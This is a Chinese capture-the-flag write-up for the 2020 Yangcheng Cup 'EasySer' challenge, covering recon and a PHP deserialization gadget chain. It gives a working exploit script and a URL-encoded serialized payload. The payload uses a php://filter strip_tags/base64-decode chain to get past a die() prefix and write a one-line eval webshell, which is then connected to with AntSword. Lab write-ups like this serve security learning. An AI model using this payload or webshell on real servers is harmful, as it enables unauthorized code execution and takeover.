# 羊城杯 2020-EasySer
一进去就是这个,直接信息搜集,robots.txt,www.zip,www.zip.gz
robots.txt:
star1.php
进入发现是
CTRL U 发现有提示说
用个不安全的协议从我家才能进ser.php
用 http://127.0.0.1/ser.php 发现有源码(可以先 star1.php 的):
ser.php:
<?php | |
error_reporting(0); | |
if ( $_SERVER['REMOTE_ADDR'] == "127.0.0.1" ) { | |
highlight_file(__FILE__); | |
} | |
$flag='{Trump_:"fake_news!"}'; | |
class GWHT{ | |
public $hero; | |
public function __construct(){ | |
$this->hero = new Yasuo; | |
} | |
public function __toString(){ | |
if (isset($this->hero)){ | |
return $this->hero->hasaki(); | |
}else{ | |
return "You don't look very happy"; | |
} | |
} | |
} | |
class Yongen{ //flag.php | |
public $file; | |
public $text; | |
public function __construct($file='',$text='') { | |
$this -> file = $file; | |
$this -> text = $text; | |
} | |
public function hasaki(){ | |
$d = '<?php die("nononon");?>'; | |
$a= $d. $this->text; | |
@file_put_contents($this-> file,$a); | |
} | |
} | |
class Yasuo{ | |
public function hasaki(){ | |
return "I'm the best happy windy man"; | |
} | |
} | |
?> |
里面有个
<?php die("nononon");?> |
他会把die 进入文件内容中,使的我们后面写入的恶意代码无法执行。
我们可以通过利用php伪协议流,写入base64编码,进行string.strip_tags过滤掉 再对文件内容进行解密,就得到了我们写入的 恶意代码,之前的被杂糅掉了,不影响我们后续的代码。
脚本:
<?php | |
class GWHT{ | |
public $hero; | |
} | |
class Yongen{ | |
public $file="php://filter/write=string.strip_tags|convert.base64-decode/resource=shell.php"; | |
public $text="PD9waHAgQGV2YWwoJF9QT1NUWzFdKTs/Pg=="; | |
//<?php @eval($_POST[1]);?> | |
} | |
$a = new GWHT(); | |
$a ->hero = new Yongen(); | |
echo urlencode(serialize($a)); |
直接修改值失败了不知道为什么,可能就是这个的原因吧
上传点不知道在哪,用哪个 arjun 扫上传参数,但是没扫出来,不知道为什么,出来的参数值为 c
http://4f22b021-d9bb-4797-8bf1-60de688b4cd7.node5.buuoj.cn:81/star1.php?path=O%3A4%3A%22GWHT%22%3A1%3A%7Bs%3A4%3A%22hero%22%3BO%3A6%3A%22Yongen%22%3A2%3A%7Bs%3A4%3A%22file%22%3Bs%3A77%3A%22php%3A%2F%2Ffilter%2Fwrite%3Dstring.strip_tags%7Cconvert.base64-decode%2Fresource%3Dshell.php%22%3Bs%3A4%3A%22text%22%3Bs%3A36%3A%22PD9waHAgQGV2YWwoJF9QT1NUWzFdKTs%2FPg%3D%3D%22%3B%7D%7D
直接蚁剑链接就行,密码为 1
参考链接:https://www.cnblogs.com/magic123/articles/17511984.html